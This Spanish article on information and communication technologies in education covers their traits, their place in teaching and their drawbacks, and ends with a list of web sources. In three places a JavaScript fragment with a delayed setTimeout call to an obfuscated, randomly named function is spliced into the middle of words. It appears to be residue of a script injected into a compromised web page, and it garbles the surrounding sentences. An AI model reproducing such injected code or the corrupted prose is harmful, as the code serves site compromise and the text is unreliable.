TIC´S EN EDUCACIÓN

Autora: Rocío Caballero Morenas.

Hace ya algunos años que venimos experimentandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando cambios en los que información ha llegado a convertirse en la “materia prima”. Con la evolución de las herramientas para generar, almacenar y transmitir datos podemos acceder a la información de una manera cada vez más fácil y económica.

Lo que conocemos como sociedad de la información se sustenta en la revolución de la tecnología de las comunicaciones. Los adelantos técnicos como internet,  la fibra óptica, los satélites y la transmisión de datos por bandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda ancha han permitido que se produzca un cambio en  la idea que teníamos de la comunicación de información.

CARACTERÍSTICAS DE LAS TIC´S.

Las principales características a resaltar de las Tic´s son:

  1. Inmaterialidad: es la ausencia de un espacio físico donde resida la información. Este lugar se conoce como  “ciberespacio” y se refiere al volumen de información que fluye por la red y al que tenemos libre acceso.

Esto favorece la comunicación con interlocutores que pueden encontrarse a miles de kilómetros, y evita la necesidad de presencia física de dicha persona. Esta comunicación puede realizarse de dos formas:

-       Síncrona: en tiempo real.

-       Asíncrona: mediante mensajes grabados y almacenados.

  1. Instantaneidad: la información se da en tiempo real, por lo que podemos obtener datos de lo que ocurre en cualquier parte del mundo en el instante en el que sucede.
  1. Interactividad: a diferencia de los medios de comunicación tradicionales, como la televisión o la radio, donde la información se transmite a unos espectadores pasivos, las TIC´s permiten una comunicación bidireccional. Las formas más interactivas de comunicación de la información son:

-       Web 2.0: se basa en las redes sociales como gestores de información, donde los propios usuarios amplían y enriquecen la red.

-       Web 3.0: se basa en la unificación de todos los programas de datos en un solo metalenguaje. También propone interactuar con máquinas de inteligencia artificial en entornos virtuales 3D.

LAS TIC EN EDUCACIÓN

Existe cierta tensión  entre los currículos tradicionales, basados en contenidos que el alumno debe aprender y memorizar; y el enfoque abierto de las TIC, como gestión de la información de la red, con la promoción del autoaprendizaje.

A los profesores de promociones más antiguas les cuesta superar esa  “brecha digital”, al aferrarse a sus métodos. Los profesores deben formarse y familiarizarse con las TIC y los entornos digitales del conocimiento, de tal manera que puedan ir actualizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sus conocimientos con la evolución de la tecnología.

Aunque el hecho de introducir las TIC en el sistema educativo no mejora por sí misma la enseñanza, se vuelve cada vez más imprescindible que alumno y profesor trabajen juntos en la elaboración de la información disponible, instituyendo lo que se conoce como “alfabetización digital”.

INCONVENIENTES

Aunque las TIC son una herramienta magnífica para innovar en el  acceso al conocimiento, aún deberán superar algunos pasos hasta llegar al nivel de respuesta exigida por los tiempos. Algunas de ellas son:

-       La formación continua del profesorado y su resistencia a dejar de ser suministradores del saber para convertirse en facilitadores del conocimiento.

-       El esfuerzo en responsabilidad e independencia que se le exige al alumno que trabaja con las TIC´s que debe tener las habilidades necesarias para tratar el exceso de información y corroborar  la fiabilidad de la información, así como, gestionar su aprendizaje.

-       Debemos reconocer que las TIC’s son  herramientas a nuestro servicio, pero por sí mismas no introducen mejoras, ni innovaciones en los sistemas educativos más allá de las propias tecnologías, por lo que resulta imprescindible el componente humano para la gestión de esas herramientas y la innovación en técnicas educativas para implementarlas.

WEBGRAFÍA

-       http://www.virtualeduca.org/documentos/yanez.pdf

-       http://boj.pntic.mec.es/jgomez46/ticedu.htm

-       http://webpages.ull.es/users/manarea/udtic/Documentos/retos%20educativos%20sociedad%20informacion.pdf

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